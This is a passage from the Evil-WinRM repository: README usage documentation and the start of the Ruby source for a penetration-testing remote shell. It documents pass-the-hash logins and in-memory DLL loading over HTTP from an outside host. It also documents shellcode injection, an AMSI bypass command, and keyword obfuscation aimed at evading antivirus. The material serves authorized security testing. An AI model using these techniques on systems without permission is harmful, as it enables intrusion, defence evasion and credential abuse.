just to use evil-winrm) 97 | - Step 1. Install bundler: `gem install bundler` 98 | - Step 2. Clone the repo: `git clone https://github.com/Hackplayers/evil-winrm.git` 99 | - Step 3. Install dependencies with bundler: `cd evil-winrm && bundle install --path vendor/bundle` 100 | - Step 4. Launch it with bundler: 101 | ``` 102 | bundle exec evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' 103 | ``` 104 | ### Method 4. Using Docker 105 | - Step 1. Launch docker container based on already built image: 106 | ``` 107 | docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/ps1_scripts/' -e '/exe_files/' 108 | ``` 109 | 110 | ## Documentation 111 | 112 | ### Clear text password 113 | If you don't want to put the password in clear text, you can optionally avoid to set `-p` argument and the password will be prompted preventing to be shown. 114 | 115 | ### Ipv6 116 | To use IPv6, the address must be added to /etc/hosts. Just put the already set name of the host after `-i` argument instead of an IP address. 117 | 118 | ### Basic commands 119 | - **upload**: local files can be auto-completed using tab key. 120 | - usage: `upload local_filename` or `upload local_filename destination_filename` 121 | - **download**: 122 | - usage: `download remote_filename` or `download remote_filename destination_filename` 123 | 124 | __Notes about paths (upload/download)__: 125 | Relative paths are not allowed to use on download/upload. Use filenames on current directory or absolute path. 126 | If you are using Evil-WinRM in a docker environment, bear in mind that all local paths should be at `/data` and be pretty sure that you mapped it as a volume in order to be able to access to downloaded files or to be able to upload files from your local host O.S. 127 | 128 | - **services**: list all services showing if there your account has permissions over each one. No administrator permissions needed to use this feature. 129 | - **menu**: load the `Invoke-Binary`, `Dll-Loader` and `Donut-Loader` functions that we will explain below. When a ps1 is loaded all its functions will be shown up. 130 | - **clear** or **cls**: clear the terminal screen. You can also use `Ctrl+L` keyboard shortcut to clear the screen. 131 | 132 | ``` 133 | *Evil-WinRM* PS C:\> menu 134 | 135 | ,. ( . ) " ,. ( . ) . 136 | (" ( ) )' ,' ( ' (" ) )' ,' . ,) 137 | .; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )(( 138 | _".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _') 139 | \_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \ 140 | | __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \ 141 | | \\ /| | |__ /_____/ \ /| | | \ | \/ Y \ 142 | /_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ / 143 | \/ \/ \/ \/ \/ 144 | 145 | By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers 146 | 147 | [+] Dll-Loader 148 | [+] Donut-Loader 149 | [+] Invoke-Binary 150 | [+] Bypass-4MSI 151 | [+] services 152 | [+] upload 153 | [+] download 154 | [+] clear 155 | [+] cls 156 | [+] menu 157 | [+] exit 158 | 159 | ``` 160 | 161 | ### Load powershell scripts 162 | - To load a ps1 file you just have to type the name (auto-completion using tab allowed). The scripts must be in the path set at `-s` argument. Type menu again and see the loaded functions. Very large files can take a long time to be loaded. 163 | 164 | ``` 165 | *Evil-WinRM* PS C:\> PowerView.ps1 166 | *Evil-WinRM* PS C:\> menu 167 | 168 | ,. ( . ) " ,. ( . ) . 169 | (" ( ) )' ,' ( ' (" ) )' ,' . ,) 170 | .; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )(( 171 | _".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _') 172 | \_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \ 173 | | __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \ 174 | | \\ /| | |__ /_____/ \ /| | | \ | \/ Y \ 175 | /_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ / 176 | \/ \/ \/ \/ \/ 177 | 178 | By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers 179 | 180 | [+] Add-DomainAltSecurityIdentity 181 | [+] Add-DomainGroupMember 182 | [+] Add-DomainObjectAcl 183 | [+] Add-RemoteConnection 184 | [+] Add-Win32Type 185 | [+] Convert-ADName 186 | [+] Convert-DNSRecord 187 | [+] ConvertFrom-LDAPLogonHours 188 | [+] ConvertFrom-SID 189 | [+] ConvertFrom-UACValue 190 | [+] Convert-LDAPProperty 191 | [+] Convert-LogonHours 192 | [+] ConvertTo-SID 193 | [+] Dll-Loader 194 | [+] Donut-Loader 195 | [+] Export-PowerViewCSV 196 | [+] field 197 | [+] Find-DomainLocalGroupMember 198 | ``` 199 | 200 | ### Advanced commands 201 | - Invoke-Binary: allows .Net assemblies to be executed in memory. The name can be auto-completed using tab key. Arguments for the exe file can be passed comma separated. Example: `Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'`. The executables must be in the path set at `-e` argument. 202 | 203 | ``` 204 | *Evil-WinRM* PS C:\> Invoke-Binary 205 | .SYNOPSIS 206 | Execute binaries from memory. 207 | PowerShell Function: Invoke-Binary 208 | Author: Luis Vacas (CyberVaca) 209 | 210 | Required dependencies: None 211 | Optional dependencies: None 212 | .DESCRIPTION 213 | 214 | .EXAMPLE 215 | Invoke-Binary /opt/csharp/Watson.exe 216 | Invoke-Binary /opt/csharp/Binary.exe param1,param2,param3 217 | Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3' 218 | Description 219 | ----------- 220 | Function that execute binaries from memory. 221 | 222 | *Evil-WinRM* PS C:\> Invoke-Binary /opt/csharp/Rubeus.exe 223 | 224 | ______ _ 225 | (_____ \ | | 226 | _____) )_ _| |__ _____ _ _ ___ 227 | | __ /| | | | _ \| ___ | | | |/___) 228 | | | \ \| |_| | |_) ) ____| |_| |___ | 229 | |_| |_|____/|____/|_____)____/(___/ 230 | 231 | v2.0.0 232 | 233 | 234 | Ticket requests and renewals: 235 | 236 | 237 | ``` 238 | 239 | - Dll-Loader: allows loading dll libraries in memory, it is equivalent to: `[Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))` 240 | 241 | The dll file can be hosted by smb, http or locally. Once it is loaded type `menu`, then it is possible to autocomplete all functions. 242 | ``` 243 | *Evil-WinRM* PS C:\> Dll-Loader 244 | .SYNOPSIS 245 | dll loader. 246 | PowerShell Function: Dll-Loader 247 | Author: Hector de Armas (3v4Si0N) 248 | 249 | Required dependencies: None 250 | Optional dependencies: None 251 | .DESCRIPTION 252 | . 253 | .EXAMPLE 254 | Dll-Loader -smb -path \\192.168.139.132\\share\\myDll.dll 255 | Dll-Loader -local -path C:\Users\Pepito\Desktop\myDll.dll 256 | Dll-Loader -http -path http://example.com/myDll.dll 257 | 258 | Description 259 | ----------- 260 | Function that loads an arbitrary dll 261 | 262 | *Evil-WinRM* PS C:\> Dll-Loader -http http://10.10.10.10/SharpSploit.dll 263 | [+] Reading dll by HTTP 264 | [+] Loading dll... 265 | *Evil-WinRM* PS C:\Users\test\Documents> menu 266 | 267 | [... Snip ...] 268 | 269 | *Evil-WinRM* PS C:\> [SharpSploit.Enumeration.Host]::GetProcessList() 270 | 271 | 272 | Pid : 0 273 | Ppid : 0 274 | Name : Idle 275 | Path : 276 | SessionID : 0 277 | Owner : 278 | Architecture : x64 279 | 280 | ``` 281 | - Donut-Loader: allows to inject x64 payloads generated with awesome [donut] technique. No need to encode the payload.bin, just generate and inject! 282 | 283 | ``` 284 | *Evil-WinRM* PS C:\> Donut-Loader 285 | .SYNOPSIS 286 | Donut Loader. 287 | PowerShell Function: Donut-Loader 288 | Author: Luis Vacas (CyberVaca) 289 | Based code: TheWover 290 | 291 | Required dependencies: None 292 | Optional dependencies: None 293 | .DESCRIPTION 294 | 295 | .EXAMPLE 296 | Donut-Loader -process_id 2195 -donutfile /home/cybervaca/donut.bin 297 | Donut-Loader -process_id (get-process notepad).id -donutfile /home/cybervaca/donut.bin 298 | 299 | Description 300 | ----------- 301 | Function that loads an arbitrary donut :D 302 | ``` 303 | 304 | You can use this [donut-maker] to generate the payload.bin if you don't use Windows. 305 | This script use a python module written by Marcello Salvati ([byt3bl33d3r]). It could be installed using pip: `pip3 install donut-shellcode` 306 | 307 | ``` 308 | python3 donut-maker.py -i Covenant.exe 309 | 310 | ___ _____ 311 | .'/,-Y" "~-. 312 | l.Y ^. 313 | /\ _\_ Donuts! 314 | i ___/" "\ 315 | | /" "\ o ! 316 | l ] o !__./ 317 | \ _ _ \.___./ "~\ 318 | X \/ \ ___./ 319 | ( \ ___. _..--~~" ~`-. 320 | ` Z,-- / \ 321 | \__. ( / ______) 322 | \ l /-----~~" / 323 | Y \ / 324 | | "x______.^ 325 | | \ 326 | j Y 327 | 328 | 329 | 330 | [+] Donut generated successfully: payload.bin 331 | ``` 332 | 333 | - Bypass-4MSI: patchs AMSI protection. 334 | ``` 335 | *Evil-WinRM* PS C:\> #amsiscanbuffer 336 | At line:1 char:1 337 | + #amsiscanbuffer 338 | + ~~~~~~~~~~~~~~~ 339 | This script contains malicious content and has been blocked by your antivirus software. 340 | + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException 341 | + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand 342 | *Evil-WinRM* PS C:\> 343 | *Evil-WinRM* PS C:\> Bypass-4MSI 344 | [+] Success! 345 | 346 | *Evil-WinRM* PS C:\> #amsiscanbuffer 347 | *Evil-WinRM* PS C:\> 348 | ``` 349 | 350 | ### Kerberos 351 | - First you have to sync date with the DC: `rdate -n ` 352 | 353 | - To generate ticket there are many ways: 354 | 355 | * Using [ticketer.py] from impacket 356 | * Using [Rubeus] or [Mimikatz] to get kirbi tickets (automatic conversion to ccache is supported) 357 | 358 | - Add ticket file. There are 3 ways: 359 | 360 | `export KRB5CCNAME=/foo/var/ticket.ccache` 361 | 362 | `cp ticket.ccache /tmp/krb5cc_0` 363 | 364 | Use the `-K` parameter: `evil-winrm -i hostname -r DOMAIN.COM -K /path/to/ticket.ccache` or `evil-winrm -i hostname -r DOMAIN.COM -K /path/to/ticket.kirbi` 365 | 366 | When using `-K`, the tool will automatically: 367 | - Detect the ticket format (ccache or kirbi) 368 | - Convert kirbi tickets to ccache format if needed (requires ticket_converter.py or impacket-ticketConverter) 369 | - Validate the file exists and is readable 370 | - Set the `KRB5CCNAME` environment variable 371 | - Resolve IP addresses to FQDN for better Kerberos compatibility 372 | 373 | - Add realm to `/etc/krb5.conf` (for linux). Use of this format is important: 374 | 375 | ``` 376 | CONTOSO.COM = { 377 | kdc = fooserver.contoso.com 378 | } 379 | ``` 380 | 381 | - Check Kerberos tickets with `klist` 382 | - To remove ticket use: `kdestroy` 383 | - For more information about Kerberos check this [cheatsheet] 384 | 385 | ### Remote path completion 386 | This feature could be not available depending of the ruby you are using. It must be compiled with readline support. Otherwise, this feature will not work (a warning will be shown). 387 | 388 | #### Method 1 (compile the needed extension) 389 | 390 | Using this method you'll compile ruby with the needed readline feature but to use only the library without changing the default ruby version on your system. Because of this, is the most recommended method. 391 | 392 | Let's suppose that you have in your Debian based system ruby 2.7.3: 393 | 394 | ``` 395 | # Install needed package 396 | apt install libreadline-dev 397 | 398 | # Check your ruby version 399 | ruby --version 400 | ruby 2.7.3p183 (2021-04-05 revision 6847ee089d) [x86_64-linux-gnu] 401 | 402 | # Download ruby source code (2.7.3 in this case): 403 | wget https://ftp.ruby-lang.org/pub/ruby/2.7/ruby-2.7.3.tar.gz 404 | 405 | # Extract source code 406 | tar -xf ruby-2.7.3.tar.gz 407 | 408 | # Compile the readline extension: 409 | cd ruby-2.7.3/ext/readline 410 | ruby ./extconf.rb 411 | make 412 | 413 | # Patch current version of the ruby readline extension: 414 | sudo cp /usr/lib/x86_64-linux-gnu/ruby/2.7.0/readline.so /usr/lib/x86_64-linux-gnu/ruby/2.7.0/readline.so.bk 415 | sudo cp -f readline.so /usr/lib/x86_64-linux-gnu/ruby/2.7.0/readline.so 416 | ``` 417 | 418 | #### Method 2 (Install ruby to use it only for evil-winrm using rbenv) 419 | 420 | Let's suppose that you want ruby 2.7.1 on a Debian based Linux and you are using zsh. This script will automatize it. You'll need to launch it from the same dir where evil-winrm.rb and Gemfile is located (the evil-winrm created dir after a git clone for example): 421 | 422 | ``` 423 | #!/usr/bin/env zsh 424 | 425 | # Uninstall possible current installed versions 426 | sudo gem uninstall evil-winrm -q 427 | gem uninstall evil-winrm -q 428 | 429 | # Install rbenv 430 | sudo apt install rbenv 431 | 432 | # Config rbenv on zshrc config file 433 | echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.zshrc 434 | echo 'eval "$(rbenv init -)"' >> ~/.zshrc 435 | source ~/.zshrc 436 | 437 | # Install ruby with readline support 438 | export RUBY_CONFIGURE_OPTS=--with-readline-dir="/usr/include/readline" 439 | rbenv install 2.7.1 440 | 441 | # Create file '.ruby-version' to set right ruby version 442 | rbenv local 2.7.1 443 | 444 | # Install local gems 445 | gem install bundler 446 | bundle install 447 | 448 | current_evwr="$(pwd)/evil-winrm.rb" 449 | 450 | sudo bash -c "cat << 'EOF' > /usr/bin/evil-winrm 451 | #!/usr/bin/env sh 452 | "${current_evwr}" "\$@" 453 | EOF" 454 | 455 | sudo chmod +x /usr/bin/evil-winrm 456 | ``` 457 | 458 | Then you can safely launch evil-winrm using the new installed ruby with the required readline support from any location. 459 | 460 | #### Method 3 (compile entire ruby) 461 | 462 | If you want to compile it yourself, you can follow these steps. Let's suppose that you want ruby 2.7.3: 463 | 464 | ``` 465 | wget -O ruby-install-0.8.1.tar.gz https://github.com/postmodern/ruby-install/archive/v0.8.1.tar.gz 466 | tar -xzvf ruby-install-0.8.1.tar.gz 467 | cd ruby-install-0.8.1/ 468 | sudo make install 469 | ruby-install ruby 2.7.3 -- --with-readline-dir=/usr/include/readline 470 | ``` 471 | Depending of your system it will be installed at `/opt/rubies/ruby-2.7.3` or maybe at ` ~/.rubies/ruby-2.7.3`. 472 | 473 | Now just need to install evil-winrm dependencies for that new installed ruby version. The easiest way is to launch command `/opt/rubies/ruby-2.7.3/bin/gem install evil-winrm`. The gem command used must be belonging to the new ruby installation. 474 | 475 | After that, you can launch safely your new installed ruby to use it on evil-winrm: `/opt/rubies/ruby-2.7.3/bin/ruby ./evil-winrm.rb -h` 476 | 477 | It is recommended to use this new installed ruby only to launch evil-winrm. If you set it up as your default ruby for your system, bear in mind that it has no dependency gems installed. Some ruby based software like Metasploit or others could not start correctly due dependencies problems. 478 | 479 | ### Logging 480 | 481 | This feature will create files on your $HOME dir saving commands and the outputs of the WinRM sessions. 482 | 483 | ### Command History 484 | 485 | Evil-WinRM maintains a persistent command history for each host and user combination. The history is stored in `~/.evil-winrm/history/` directory with files named as `{host}_{user}.hist`. 486 | 487 | When you connect to a machine you've previously accessed, you can use the arrow keys (Up/Down) to navigate through your previous commands. The history is automatically saved after each command execution and loaded when you reconnect to the same host with the same user. 488 | 489 | ### Known problems. OpenSSL errors 490 | 491 | Sometimes, you could face an error like this: 492 | 493 | ``` 494 | Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error 495 | ``` 496 | 497 | The error is caused because the OpenSSL 3.0 version retired some legacy functions like MD4 which are needed to run this tool. There are different existing workarounds to deal with this situation: 498 | 499 | - Update your system to the latest. Likely, this problem was automatically fixed on latest Ruby versions that are using newer OpenSSL versions. 500 | - Compile your own Ruby using old OpenSSL 1.x instead of OpenSSL 3.0 or compile it using OpenSSL > 3.0 to avoid the problematic 3.0 version. 501 | - The easiest one. Edit your `/etc/ssl/openssl.cnf` config file and be sure the config is like this: 502 | 503 | ``` 504 | openssl_conf = openssl_init 505 | 506 | [openssl_init] 507 | providers = provider_sect 508 | 509 | [provider_sect] 510 | default = default_sect 511 | legacy = legacy_sect 512 | 513 | [default_sect] 514 | activate = 1 515 | 516 | [legacy_sect] 517 | activate = 1 518 | ``` 519 | 520 | - As an alternative for the last workaround, if your system is using LibreSSL instead of OpenSSL or maybe you just don't want to modify your system config file. Create a simple file containing the above content. Any name can be used, for example `evil-tls.conf`. After that, export an environment var to force the system to use it: `export OPENSSL_CONF="/path/to/evil-tls.conf"`. And then launch the tool, the error will disappear. 521 | 522 | 523 | ## Changelog: 524 | Changelog and project changes can be checked here: [CHANGELOG.md](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/CHANGELOG.md) 525 | 526 | ## Credits: 527 | Staff: 528 | 529 | - [Cybervaca], (founder). Twitter (X): [@CyberVaca_] 530 | - [OscarAkaElvis], Twitter (X): [@OscarAkaElvis] 531 | - [Jarilaos], Twitter (X): [@_Laox] 532 | - [arale61], Twitter (X): [@arale61] 533 | 534 | Hat tip to: 535 | 536 | - [Vis0r] for his personal support. 537 | - [Alamot] for his original code. 538 | - [3v4Si0N] for his awesome dll loader. 539 | - [WinRb] All contributors of ruby library. 540 | - [TheWover] for his awesome donut tool. 541 | - [byt3bl33d3r] for his python library to create donut payloads. 542 | - [Sh11td0wn] for inspiration about new features. 543 | - [Borch] for his help adding logging feature. 544 | - [Hackplayers] for giving a shelter on their github to this software. 545 | 546 | ## Disclaimer & License 547 | This script is licensed under LGPLv3+. Direct link to [License](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/LICENSE). 548 | 549 | Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. 550 | Any misuse of this software will not be the responsibility of the author or of any other collaborator. 551 | Use it at your own servers and/or with the server owner's permission. 552 | 553 | 554 | [Cybervaca]: https://github.com/cybervaca 555 | [OscarAkaElvis]: https://github.com/OscarAkaElvis 556 | [Jarilaos]: https://github.com/jarilaos 557 | [arale61]: https://github.com/arale61 558 | [Vis0r]: https://github.com/vmotos 559 | [Alamot]: https://github.com/Alamot 560 | [3v4Si0N]: https://github.com/3v4Si0N 561 | [Borch]: https://github.com/Stoo0rmq 562 | [donut]: https://github.com/TheWover/donut 563 | [donut-maker]: https://github.com/Hackplayers/Salsa-tools/blob/master/Donut-Maker/donut-maker.py 564 | [byt3bl33d3r]: https://twitter.com/byt3bl33d3r 565 | [WinRb]: https://github.com/WinRb/WinRM/graphs/contributors 566 | [TheWover]: https://github.com/TheWover 567 | [Sh11td0wn]: https://github.com/Sh11td0wn 568 | [ticketer.py]: https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py 569 | [ticket_converter.py]: https://github.com/Zer1t0/ticket_converter 570 | [Rubeus]: https://github.com/GhostPack/Rubeus 571 | [Mimikatz]: https://github.com/gentilkiwi/mimikatz 572 | [cheatsheet]: https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a 573 | [Dockerhub]: https://hub.docker.com/r/oscarakaelvis/evil-winrm 574 | [Hackplayers]: https://www.hackplayers.com/ 575 | 576 | 577 | [@CyberVaca_]: https://twitter.com/CyberVaca_ 578 | [@OscarAkaElvis]: https://twitter.com/OscarAkaElvis 579 | [@_Laox]: https://twitter.com/_Laox 580 | [@arale61]: https://twitter.com/arale61 581 | 582 | 583 | [Version-shield]: https://img.shields.io/badge/version-3.9-blue.svg?style=flat-square&colorA=273133&colorB=0093ee "Latest version" 584 | [Ruby2.3-shield]: https://img.shields.io/badge/ruby-2.3%2B-blue.svg?style=flat-square&colorA=273133&colorB=ff0000 "Ruby 2.3 or later" 585 | [License-shield]: https://img.shields.io/badge/license-LGPL%20v3%2B-blue.svg?style=flat-square&colorA=273133&colorB=bd0000 "LGPL v3+" 586 | [Docker-shield]: https://img.shields.io/docker/automated/oscarakaelvis/evil-winrm.svg?style=flat-square&colorA=273133&colorB=a9a9a9 "Docker rules!" 587 | [Gem-Version]: https://img.shields.io/gem/v/evil-winrm?style=flat-square&colorA=273133&colorB=46c249 "Ruby gem" 588 | -------------------------------------------------------------------------------- /evil-winrm.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | # frozen_string_literal: true 3 | 4 | # Author: CyberVaca 5 | # Twitter: https://twitter.com/CyberVaca_ 6 | # Based on the Alamot's original code 7 | 8 | # Dependencies 9 | require 'English' 10 | require 'winrm' 11 | require 'winrm-fs' 12 | require 'stringio' 13 | require 'base64' 14 | require 'readline' 15 | require 'optionparser' 16 | require 'io/console' 17 | require 'time' 18 | require 'fileutils' 19 | require 'logger' 20 | require 'shellwords' 21 | 22 | # Constants 23 | 24 | # Version 25 | VERSION = '3.9' 26 | 27 | # Msg types 28 | TYPE_INFO = 0 29 | TYPE_ERROR = 1 30 | TYPE_WARNING = 2 31 | TYPE_DATA = 3 32 | TYPE_SUCCESS = 4 33 | 34 | # Global vars 35 | 36 | # Available commands 37 | $LIST = %w[Bypass-4MSI services upload download clear cls menu exit] 38 | $COMMANDS = $LIST.dup 39 | $CMDS = $COMMANDS.clone 40 | $LISTASSEM = [''].sort 41 | $DONUTPARAM1 = ['-process_id'] 42 | $DONUTPARAM2 = ['-donutfile'] 43 | 44 | # menu and show-global-methods commands 45 | $MENU_CMD = "" 46 | $SHOW_GLOBAL_METHODS_CMD = "" 47 | 48 | $WORDS_RANDOM_CASE = [ 49 | '[Runtime.InteropServices.Marshal]', 50 | 'System.Runtime.InteropServices.Marshal', 51 | 'System.Reflection.Emit.AssemblyBuilderAccess', 52 | 'System.Reflection.CallingConventions', 53 | 'System.Reflection.AssemblyName', 54 | 'System.MulticastDelegate', 55 | 'GetDelegateForFunctionPointer', 56 | 'Import-PowerShellDataFile', 57 | 'ImportSystemModules', 58 | 'New-TemporaryFile', 59 | '.MakeByRefType', 60 | '.CreateType', 61 | '.DefineConstructor', 62 | '.DefineMethod', 63 | '.DefineDynamicModule', 64 | 'function ', 65 | 'WriteByte', 66 | '[Ref]', 67 | 'Assembly.GetType', 68 | 'GetField', 69 | '[System.Net.WebUtility]', 70 | 'HtmlDecode', 71 | 'Reflection.BindingFlags', 72 | 'NonPublic', 73 | 'Static', 74 | 'GetValue', 75 | 'ForEach-Object', 76 | 'Where-Object', 77 | 'Select-Object', 78 | '.name', 79 | 'showmethods', 80 | 'function:', 81 | '.CommandType', 82 | '-contains', 83 | '-notmatch', 84 | '-like', 85 | '-notlike', 86 | '-notcontains', 87 | '-and', 88 | 'ls ', 89 | '$global', 90 | '-Property' 91 | ] 92 | 93 | # Colors and path completion 94 | $colors_enabled = true 95 | $check_rpath_completion = true 96 | 97 | # Path for ps1 scripts and exec files 98 | $scripts_path = '' 99 | $executables_path = '' 100 | 101 | # Connection vars initialization 102 | $host = '' 103 | $port = '5985' 104 | $user = '' 105 | $password = '' 106 | $url = 'wsman' 107 | $default_service = 'HTTP' 108 | $full_logging_path = "#{Dir.home}/evil-winrm-logs" 109 | $user_agent = "Microsoft WinRM Client" 110 | $ccache_file = nil 111 | $original_krb5ccname = nil 112 | $kerberos_cleanup_registered = false 113 | 114 | # Redefine download method from winrm-fs 115 | module WinRM 116 | module FS 117 | class FileManager 118 | def download(remote_path, local_path, chunk_size = 1024 * 1024, first = true, size: -1) 119 | @logger.debug("downloading: #{remote_path} -> #{local_path} #{chunk_size}") 120 | index = 0 121 | return download_dir(remote_path, local_path, chunk_size, false) if remote_path.match?(/(\*\.?|\*\*|\.?\*|\*)/) 122 | output = _output_from_file(remote_path, chunk_size, index) 123 | return download_dir(remote_path, local_path, chunk_size, true) if output.exitcode == 2 124 | return false if output.exitcode >= 1 125 | 126 | File.open(local_path, 'wb') do |fd| 127 | begin 128 | out = _write_file(fd, output) 129 | index += out.length 130 | until out.empty? 131 | yield index, size if size != -1 132 | output = _output_from_file(remote_path, chunk_size, index) 133 | return false if output.exitcode >= 1 134 | 135 | out = _write_file(fd, output) 136 | index += out.length 137 | end 138 | rescue EstandardError => err 139 | @logger.debug("IO Failed: " + err.to_s) 140 | raise 141 | end 142 | end 143 | end 144 | 145 | def download_dir(remote_path, local_path, chunk_size, first) 146 | index_exp = remote_path.index(/(\*\.?|\*\*|\.?\*|\*)/) || 0 147 | remote_file_path = remote_path 148 | 149 | if index_exp > 0 150 | index_last_folder = remote_file_path.rindex(/[\\\/]/, index_exp) 151 | remote_file_path = remote_file_path[0..index_last_folder-1] 152 | end 153 | 154 | FileUtils.mkdir_p(local_path) unless File.directory?(local_path) 155 | command = "Get-ChildItem #{remote_path} | Select-Object Name" 156 | 157 | @connection.shell(:powershell) { |e| e.run(command) }.stdout.strip.split(/\n/).drop(2).each do |file| 158 | download(File.join(remote_file_path.to_s, file.strip), File.join(local_path, file.strip), chunk_size, false) 159 | end 160 | end 161 | 162 | true 163 | end 164 | end 165 | end 166 | 167 | # Class creation 168 | class EvilWinRM 169 | # Initialization 170 | def initialize 171 | @psLoaded = false 172 | @directories = {} 173 | @cache_ttl = 10 174 | @executables = [] 175 | @functions = [] 176 | @Bypass_4MSI_loaded = false 177 | end 178 | 179 | # Remote path completion compatibility check 180 | def completion_check 181 | if $check_rpath_completion == true 182 | begin 183 | Readline.quoting_detection_proc 184 | @completion_enabled = true 185 | rescue NotImplementedError, NoMethodError => e 186 | @completion_enabled = false 187 | print_message("Remote path completions is disabled due to ruby limitation: #{e}", TYPE_WARNING) 188 | print_message('For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion', TYPE_DATA) 189 | end 190 | else 191 | @completion_enabled = false 192 | print_message('Remote path completion is disabled', TYPE_WARNING) 193 | end 194 | end 195 | 196 | # Arguments 197 | def arguments 198 | options = { port: $port, url: $url, service: $service, user_agent: $user_agent } 199 | optparse = OptionParser.new do |opts| 200 | opts.banner = 'Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-a USERAGENT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [-K TICKET_FILE] [--spn SPN_PREFIX] [-l]' 201 | opts.on('-S', '--ssl', 'Enable ssl') do |_val| 202 | $ssl = true 203 | options[:port] = '5986' 204 | end 205 | opts.on('-c', '--pub-key PUBLIC_KEY_PATH', 'Local path to public key certificate') do |val| 206 | options[:pub_key] = val 207 | end 208 | opts.on('-k', '--priv-key PRIVATE_KEY_PATH', 'Local path to private key certificate') do |val| 209 | options[:priv_key] = val 210 | end 211 | opts.on('-r', '--realm DOMAIN', 212 | 'Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }') do |val| 213 | options[:realm] = val.upcase 214 | end 215 | opts.on('-s', '--scripts PS_SCRIPTS_PATH', 'Powershell scripts local path') do |val| 216 | options[:scripts] = val 217 | end 218 | opts.on('--spn SPN_PREFIX', 'SPN prefix for Kerberos auth (default HTTP)') { |val| options[:service] = val } 219 | opts.on('-K', '--ccache TICKET_FILE', 'Path to Kerberos ticket file (ccache or kirbi format, auto-detected)') { |val| options[:ccache] = val } 220 | opts.on('-e', '--executables EXES_PATH', 'C# executables local path') { |val| options[:executables] = val } 221 | opts.on('-i', '--ip IP', 'Remote host IP or hostname. FQDN for Kerberos auth (required)') do |val| 222 | options[:ip] = val 223 | end 224 | opts.on('-U', '--url URL', 'Remote url endpoint (default /wsman)') { |val| options[:url] = val } 225 | opts.on('-u', '--user USER', 'Username (required if not using kerberos)') { |val| options[:user] = val } 226 | opts.on('-p', '--password PASS', 'Password') { |val| options[:password] = val } 227 | opts.on('-H', '--hash HASH', 'NTHash') do |val| 228 | if !options[:password].nil? && !val.nil? 229 | print_header 230 | print_message('You must choose either password or hash auth. Both at the same time are not allowed', TYPE_ERROR) 231 | custom_exit(1, false) 232 | end 233 | unless val.match(/^[a-fA-F0-9]{32}$/) 234 | print_header 235 | print_message('Invalid hash format', TYPE_ERROR) 236 | custom_exit(1, false) 237 | end 238 | options[:password] = "00000000000000000000000000000000:#{val}" 239 | end 240 | opts.on('-P', '--port PORT', 'Remote host port (default 5985)') { |val| options[:port] = val } 241 | opts.on('-a', '--user-agent USERAGENT', 'Specify connection user-agent (default Microsoft WinRM Client)') do |val| 242 | options[:user_agent] = val 243 | end 244 | opts.on('-V', '--version', 'Show version') do |_val| 245 | puts("v#{VERSION}") 246 | custom_exit(0, false) 247 | end 248 | opts.on('-n', '--no-colors', 'Disable colors') do |_val| 249 | $colors_enabled = false 250 | end 251 | opts.on('-N', '--no-rpath-completion', 'Disable remote path completion') do |_val| 252 | $check_rpath_completion = false 253 | end 254 | opts.on('-l', '--log', 'Log the WinRM session') do |_val| 255 | $log = true 256 | $filepath = '' 257 | $logfile = '' 258 | $logger = '' 259 | end 260 | opts.on('-h', '--help', 'Display this help message') do 261 | print_header 262 | puts 263 | puts(opts) 264 | custom_exit(0, false) 265 | end 266 | end 267 | 268 | begin 269 | optparse.parse! 270 | mandatory = if options[:realm].nil? && options[:priv_key].nil? && options[:pub_key].nil? 271 | %i[ip user] 272 | else 273 | [:ip] 274 | end 275 | missing = mandatory.select { |param| options[param].nil? } 276 | raise OptionParser::MissingArgument, missing.join(', ') unless missing.empty? 277 | rescue OptionParser::InvalidOption, OptionParser::MissingArgument 278 | print_header 279 | print_message($ERROR_INFO.to_s, TYPE_ERROR, true, $logger) 280 | puts 281 | puts(optparse) 282 | custom_exit(1, false) 283 | end 284 | 285 | if options[:password].nil? && options[:realm].nil? && options[:priv_key].nil? && options[:pub_key].nil? 286 | options[:password] = $stdin.getpass(prompt = 'Enter Password: ') 287 | end 288 | 289 | $host = options[:ip] 290 | $user = options[:user] 291 | $password = options[:password] 292 | $port = options[:port] 293 | $scripts_path = options[:scripts] 294 | $executables_path = options[:executables] 295 | $url = options[:url] 296 | $pub_key = options[:pub_key] 297 | $priv_key = options[:priv_key] 298 